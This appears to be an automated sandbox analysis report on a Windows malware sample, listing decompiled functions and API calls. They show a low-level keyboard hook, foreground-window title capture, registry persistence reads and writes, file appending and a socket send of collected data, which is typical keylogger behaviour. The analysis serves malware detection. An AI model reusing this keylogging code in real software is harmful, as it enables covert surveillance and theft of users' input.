                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??3@??4?$basic_string@Y?$basic_string@malloc
                                                                                • String ID:
                                                                                • API String ID: 3021022117-0
                                                                                • Opcode ID: 920b98becae29a99ec0fa19a0f55f8e27bcd435965bf0e4788e191e54b25dd4e
                                                                                • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                                                                • Opcode Fuzzy Hash: 920b98becae29a99ec0fa19a0f55f8e27bcd435965bf0e4788e191e54b25dd4e
                                                                                • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				void* _t15;
				int _t17;
				long _t19;
				long _t20;
				long _t22;
				long _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t15 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24); // executed
				_t28 = _t15;
				if(_t28 != 0xffffffff) {
					if(_a16 != 1) {
						L8:
						_t17 = WriteFile(_t28, _a4, _a8,  &_a12, _t24); // executed
						if(_t17 != 0) {
							_t24 = 1;
						}
						L10:
						FindCloseChangeNotification(_t28); // executed
						_t19 = _t24;
						goto L11;
					}
					_t20 = SetFilePointer(_t28, _t24, _t24, 2); // executed
					if(_t20 == 0xffffffff) {
						goto L10;
					}
					goto L8;
				} else {
					_t19 = 0;
					L11:
					return _t19;
				}
			}













                                                                                0x00412d5f
                                                                                0x00412d62
                                                                                0x00412d64
                                                                                0x00412d74
                                                                                0x00412d7b
                                                                                0x00412d66
                                                                                0x00412d67
                                                                                0x00412d6b
                                                                                0x00412d6c
                                                                                0x00412d6f
                                                                                0x00412d6f
                                                                                0x00412d67
                                                                                0x00412d93
                                                                                0x00412d99
                                                                                0x00412d9e
                                                                                0x00412da8
                                                                                0x00412dba
                                                                                0x00412dc6
                                                                                0x00412dce
                                                                                0x00412dd0
                                                                                0x00412dd0
                                                                                0x00412dd2
                                                                                0x00412dd3
                                                                                0x00412dd9
                                                                                0x00000000
                                                                                0x00412dd9
                                                                                0x00412daf
                                                                                0x00412db8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412da0
                                                                                0x00412da0
                                                                                0x00412ddb
                                                                                0x00412dde
                                                                                0x00412dde

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 00412DAF
                                                                                • WriteFile.KERNELBASE(00000000,40000000,?,?,00000000), ref: 00412DC6
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00412DD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateFindNotificationPointerWrite
                                                                                • String ID:
                                                                                • API String ID: 175865374-0
                                                                                • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                                                                • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                                                                • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                                                                • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                • RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                                                                • String ID:
                                                                                • API String ID: 2462357041-0
                                                                                • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                                                                • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
                                                                                • Opcode Fuzzy Hash: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                                                                • Instruction Fuzzy Hash: F60108B650020DFFDF01DF90DC84DEA7B6DFB48348F104462FA05A6151D7309A659BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004052D5, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004052D5(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				struct HHOOK__* _t11;
				struct HHOOK__** _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					_t11 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // executed
					 *_t14 = _t11;
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}






                                                                                0x004052dd
                                                                                0x004052e1
                                                                                0x004052e9
                                                                                0x00405300
                                                                                0x0040530f
                                                                                0x00405315
                                                                                0x0040531f
                                                                                0x00000000
                                                                                0x0040531f
                                                                                0x004052eb
                                                                                0x004052f4
                                                                                0x004052fa
                                                                                0x004052fc
                                                                                0x004052fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004052fe
                                                                                0x0040532c

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$DispatchHookTranslateWindows
                                                                                • String ID:
                                                                                • API String ID: 1978648212-0
                                                                                • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                                                                • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                                                                • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                                                                • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041358B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 384503197-0
                                                                                • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                                                                • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                                                                • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                                                                • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040309E, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 2505548081-0
                                                                                • Opcode ID: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                                                                • Instruction ID: d80b3b6c6aed89596c133f447bcdc90fdca9c0e00c1408e091cb816f9a065f40
                                                                                • Opcode Fuzzy Hash: 9697f98c185c8dbb6fe00f519fde4b1936163652de48f83fe795a14545806d9b
                                                                                • Instruction Fuzzy Hash: A5F0F23240011EEFCF04EF94DC58CEE7B78FF88255B008829F926971A0EB70AA15CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B692, Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040B692(void* _a4, void* _a8, char* _a12, char* _a16, int _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v1028;
				long _t16;
				long _t19;

				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					L3:
					return 0;
				} else {
					_t19 = RegQueryValueExA(_a8, _a12, 0, 0, _a16,  &_a20); // executed
					RegCloseKey(_a8); // executed
					if(_t19 != 0) {
						goto L3;
					} else {
						E00402F9B( &_v1028, _a24, _a28);
						E00403010( &_v1028, _a16, _a20);
						return 1;
					}
				}
			}






                                                                                0x0040b6ac
                                                                                0x0040b6b4
                                                                                0x0040b704
                                                                                0x0040b707
                                                                                0x0040b6b6
                                                                                0x0040b6c8
                                                                                0x0040b6d3
                                                                                0x0040b6dc
                                                                                0x00000000
                                                                                0x0040b6de
                                                                                0x0040b6ea
                                                                                0x0040b6fb
                                                                                0x0040b703
                                                                                0x0040b703
                                                                                0x0040b6dc

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                • RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                • RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                                                                • Instruction ID: 12c492740cd6cd608dd50e7b32a974a13a24a52f7ce3ce9e30b48251fadff788
                                                                                • Opcode Fuzzy Hash: 0c6a4740dae7841fcf8964945fbab675c41921e593c3645a08b688649a1aa0f7
                                                                                • Instruction Fuzzy Hash: CA01FB35100209FFDF119F90EC05FDA3B75FB88758F008025FA14A61A0D775D925EB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B4C8, Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040B4C8(void* __ecx, void* _a4, void* _a8, char* _a12, char* _a16) {
				int _v8;
				int _v12;
				int _t14;
				long _t16;
				long _t20;
				signed int _t21;

				_t14 = 4;
				_v8 = _t14;
				_v12 = _t14;
				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20019,  &_a8); // executed
				if(_t16 != 0) {
					return 0;
				} else {
					_t20 = RegQueryValueExA(_a8, _a12, 0,  &_v12, _a16,  &_v8); // executed
					_t21 = RegCloseKey(_a8); // executed
					return _t21 & 0xffffff00 | _t20 == 0x00000000;
				}
			}









                                                                                0x0040b4cf
                                                                                0x0040b4d0
                                                                                0x0040b4d3
                                                                                0x0040b4e7
                                                                                0x0040b4ef
                                                                                0x0040b521
                                                                                0x0040b4f1
                                                                                0x0040b505
                                                                                0x0040b510
                                                                                0x0040b51d
                                                                                0x0040b51d

                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                                                                • RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                                                                • RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                                                                • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                                                                • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                                                                • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412660, Relevance: 4.5, APIs: 3, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 58%
                                                                                			E00412660(intOrPtr _a4) {
				char _v5;
				short _v520;
				struct HWND__* _t6;

				_t6 = GetForegroundWindow(); // executed
				GetWindowTextW(_t6,  &_v520, 0x200);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v520,  &_v5);
				return _a4;
			}






                                                                                0x00412669
                                                                                0x0041267c
                                                                                0x00412690
                                                                                0x0041269a

                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 00412669
                                                                                • GetWindowTextW.USER32 ref: 0041267C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412690
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@Window$??0?$basic_string@ForegroundG@1@@G@2@@std@@G@std@@TextU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 3479648101-0
                                                                                • Opcode ID: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                                                                • Instruction ID: 64d1ce8039e3a540394b6b1977bfd4dfbb3997696942590b923d2ce918142fcd
                                                                                • Opcode Fuzzy Hash: 63886bd1b0f191d4c741fb758813c9ae68fde036165b119f932706caa7c95f77
                                                                                • Instruction Fuzzy Hash: 40E0ECB950030FEBDB04EBA0ED4DED9777CAB44309F0081A1B61697191DA74A6498F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004122C4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004122C4(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				intOrPtr* _t8;

				_v68.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v68); // executed
				_t8 = _a4;
				 *_t8 = _v68.ullTotalPhys;
				 *((intOrPtr*)(_t8 + 4)) = _v68.ullAvailPhys;
				return _t8;
			}





                                                                                0x004122cd
                                                                                0x004122d5
                                                                                0x004122db
                                                                                0x004122e1
                                                                                0x004122e6
                                                                                0x004122ea

                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?), ref: 004122D5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID: @
                                                                                • API String ID: 1890195054-2766056989
                                                                                • Opcode ID: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                                                                • Instruction ID: 75f814dcae9d38af4eaa51e93271515a162649f50c927f4fe6c9e38d045eb332
                                                                                • Opcode Fuzzy Hash: 933be3831ea0970a646f6a91defc356e7c8b327d25a017e9f5a00cd18de0f79f
                                                                                • Instruction Fuzzy Hash: E8D067B8901308DFCB04DF94D54999CBBB9BB48344F404058E906A7350DB74E905CA95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B8F8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                                                                  • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                                                                  • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                                                                  • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                                                                  • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                  • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                  • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                  • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                  • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                  • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                                                                • String ID:
                                                                                • API String ID: 4160275866-0
                                                                                • Opcode ID: b2e0470a93ee0f3f7cf7b71ac6b7d48d6e6ad16f6805a67cf5153e056b09b440
                                                                                • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                                                                • Opcode Fuzzy Hash: b2e0470a93ee0f3f7cf7b71ac6b7d48d6e6ad16f6805a67cf5153e056b09b440
                                                                                • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004020C2, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                                                                  • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                                                                  • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                                                                  • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                                                                  • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                                                                  • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                                                                  • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                                                                  • Part of subcall function 00402440: #19.WS2_32(?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024BB
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                                                                  • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
